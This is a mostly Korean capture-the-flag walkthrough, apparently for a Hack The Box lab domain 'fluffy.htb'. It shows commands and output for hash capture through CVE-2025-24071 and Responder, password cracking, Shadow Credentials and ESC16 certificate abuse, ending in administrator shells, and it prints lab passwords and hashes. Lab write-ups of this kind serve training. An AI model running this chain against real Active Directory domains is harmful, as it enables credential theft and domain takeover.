Proof of Concept
10.129.68.69
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.68.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --generate-hosts-file hosts
SMB 10.129.68.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.68.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
┌──(kali🎃kali)-[~/Fluffy]
└─$ cat hosts
10.129.68.69 DC01.fluffy.htb DC01/etc/hosts 파일 수정
┌──(kali🎃kali)-[~/Fluffy]
└─$ cat /etc/hosts
<SNIP>
10.129.68.69 DC01.fluffy.htb DC01
Bloodhound 정보 수집
┌──(kali🎃kali)-[~/Fluffy]
└─$ bloodhound-python -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.68.69 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::934:b65d:604f:a04f
INFO: Trying LDAP connection to dead:beef::934:b65d:604f:a04f
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::934:b65d:604f:a04f
INFO: Trying LDAP connection to dead:beef::934:b65d:604f:a04fAuth as P.AGILA
j.fleischman / J0elTHEM4n1990!
SMB 공유 폴더 확인
- IT 폴더에 대해 읽기/쓰기 권한 보유
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.68.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.68.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.68.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.68.69 445 DC01 [*] Enumerated shares
SMB 10.129.68.69 445 DC01 Share Permissions Remark
SMB 10.129.68.69 445 DC01 ----- ----------- ------
SMB 10.129.68.69 445 DC01 ADMIN$ Remote Admin
SMB 10.129.68.69 445 DC01 C$ Default share
SMB 10.129.68.69 445 DC01 IPC$ READ Remote IPC
SMB 10.129.68.69 445 DC01 IT READ,WRITE
SMB 10.129.68.69 445 DC01 NETLOGON READ Logon server share
SMB 10.129.68.69 445 DC01 SYSVOL READ Logon server shareIT 디렉토리 확인
- KeePass와 PDF 파일 발견
┌──(kali🎃kali)-[~/Fluffy]
└─$ smbclient //DC01.fluffy.htb/IT/ -U 'j.fleischman' --password='J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 20 17:05:39 2026
.. D 0 Tue Jan 20 17:05:39 2026
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025PDF 파일 다운로드
smb: \> get Upgrade_notice.pdf
getting file \Upgrade_notice.pdf of size 169963 as Upgrade_notice.pdf (77.7 KiloBytes/sec) (average 77.7 KiloBytes/sec)PDF 파일 내용에서 현재 서버에 취약한 CVE 번호 확인
- CVE-2025-24996
- CVE-2025-24071
- CVE-2025-46785
- CVE-2025-29968
- CVE-2025-21193
- CVE-2025-3445
CVE-2025-24071을 통해 NTLM 해시를 스푸핑 가능
CVE-2025-24071 POC 코드 다운로드
┌──(kali🎃kali)-[~/Fluffy]
└─$ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
lremote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.POC 코드를 실행하여 exploit.zip 파일 생성
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ python poc.py
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.81
completed
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ l
exploit.zip poc.py README.md생성된 exploit.zip 파일을 SMB 서버에 업로드
┌──(kali🎃kali)-[~/Fluffy/CVE-2025-24071_PoC]
└─$ smbclient //10.129.232.88/IT -U 'j.fleischman' --password='J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 19 10:27:02 2025
.. D 0 Mon May 19 10:27:02 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.5 kB/s) (average 0.1 kB/s)스푸핑 리스너 실행
┌──(kali🎃kali)-[~/Fluffy]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]잠시 기다리면 NTLM 해시 획득 가능
[SMB] NTLMv2-SSP Client : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:bcad1ed6959d4e40:42401EC29E2813CE62F7B144E26DC239:010100000000000080369C201F8ADC01CC7B1E38CD627023000000000200080051004E003200310001001E00570049004E002D0059004F0036003300450054005500430032005600390004003400570049004E002D0059004F003600330045005400550043003200560039002E0051004E00320031002E004C004F00430041004C000300140051004E00320031002E004C004F00430041004C000500140051004E00320031002E004C004F00430041004C000700080080369C201F8ADC010600040002000000080030003000000000000000010000000020000002CC6C1F67AEF262350FEB40FCF2546E885130149865CB4F3881C328EBD9E9E50A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380031000000000000000000
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[+] Exiting...NTLM 해시를 크랙해서 평문 비밀번호 획득
- prometheusx-303
┌──(kali🎃kali)-[~/Fluffy]
└─$ hashcat -m 5600 p.agila.hash /usr/share/wordlists/rockyou.txt --quiet
P.AGILA::FLUFFY:bcad1ed6959d4e40:42401ec29e2813ce62f7b144e26dc239:010100000000000080369c201f8adc01cc7b1e38cd627023000000000200080051004e003200310001001e00570049004e002d0059004f0036003300450054005500430032005600390004003400570049004e002d0059004f003600330045005400550043003200560039002e0051004e00320031002e004c004f00430041004c000300140051004e00320031002e004c004f00430041004c000500140051004e00320031002e004c004f00430041004c000700080080369c201f8adc010600040002000000080030003000000000000000010000000020000002cc6c1f67aef262350feb40fcf2546e885130149865cb4f3881c328ebd9e9e50a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00380031000000000000000000:prometheusx-303P.AGILA / prometheusx-303로 SMB 인증 성공
┌──(kali🎃kali)-[~/Fluffy]
└─$ nxc smb 10.129.232.88 -u 'P.AGILA' -p 'prometheusx-303'
SMB 10.129.232.88 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.88 445 DC01 [+] fluffy.htb\P.AGILA:prometheusx-303Auth as winrm_svc
Checked the bloodhound-ce
- The user P.AGILA@FLUFFY.HTB is a member of the group SERVICE ACCOUNT MANAGERS@FLUFFY.HTB.
- The members of this group (SERVICE ACCOUNT MANAGERS@FLUFFY.HTB) have GenericAll permissions to the group SERVICE ACCOUNTS@FLUFFY.HTB.
- The members of the group SERVICE ACCOUNTS@FLUFFY.HTB have generic write access to the user WINRM_SVC@FLUFFY.HTB.
SERVICE ACCOUNTS 그룹에 P.AGILA 사용자 추가
┌──(kali🎃kali)-[~/Fluffy]
└─$ bloodyAD -d 'fluffy.htb' -u 'P.AGILA' -p 'prometheusx-303' --host 10.129.232.88 add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
Shadow Credentials 공격 수행
- winrm_svc의 NTLM 해시 획득
- 33bd09dcd697600edf6b3a7af4875767
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad shadow auto -u 'P.AGILA' -p 'prometheusx-303' -account 'winrm_svc' -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3985becbedb84d9580009a2b6b84f09d'
[*] Adding Key Credential with device ID '3985becbedb84d9580009a2b6b84f09d' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '3985becbedb84d9580009a2b6b84f09d' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767획득한 해시를 사용하여 winrm 접속 성공
┌──(kali🎃kali)-[~/Fluffy]
└─$ evil-winrm -i 10.129.232.88 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
3a25c882372baf60f8e138f701b684bf
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f22c:7791:984d:297
Link-local IPv6 Address . . . . . : fe80::9218:a844:af34:cff4%11
IPv4 Address. . . . . . . . . . . : 10.129.232.88
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%11
10.129.0.1Privilege Escalation
동일한 방법으로 ca_svc 계정 NTLM 해시 획득
- ca_svc:ca0f4f9e9eb8a092addf53bb03fc98c8
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad shadow auto -u 'p.agila' -p 'prometheusx-303' -account ca_svc -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '293e60af51954a628df0715c992df9ea'
[*] Adding Key Credential with device ID '293e60af51954a628df0715c992df9ea' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '293e60af51954a628df0715c992df9ea' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8certipy를 사용하여 취약점 탐색
- ESC16에 취약
┌──(kali🎃kali)-[~/Fluffy]
└─$ certipy-ad find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -vulnerable -dc-ip 10.129.232.88
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260121170350_Certipy.txt'
[*] Wrote text output to '20260121170350_Certipy.txt'
[*] Saving JSON output to '20260121170350_Certipy.json'
[*] Wrote JSON output to '20260121170350_Certipy.json'
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ cat 20260121170350_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templatesRead initial UPN of the ca_svc account
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account read -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'administrator' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2026-01-21T21:59:56+00:00Update the ca_svc account’s UPN to the target administrator’s sAMAccountName
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account update -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'administrator' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'Request a certificate as the ca_svc
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ export KRB5CCNAME=ca_svc.ccache
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad req -k -dc-ip '10.129.232.88' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'Revert the “ca_svc” account’s UPN
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad account update -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -upn 'ca_svc@fluffy.htb' -user 'ca_svc'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'administrator NTLM 해시 획득
- 8da83a3fa618b6e3a00e93f676c92a6e
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb' -dc-ip '10.129.232.88'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6eadministrator로 winrm 접속
┌──(kali🎃kali)-[~/Fluffy/certipy_find]
└─$ evil-winrm -i 10.129.232.88 -u 'administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
099730de0de385d0647f0371a2180cb6
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f22c:7791:984d:297
Link-local IPv6 Address . . . . . : fe80::9218:a844:af34:cff4%11
IPv4 Address. . . . . . . . . . . : 10.129.232.88
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%11
10.129.0.1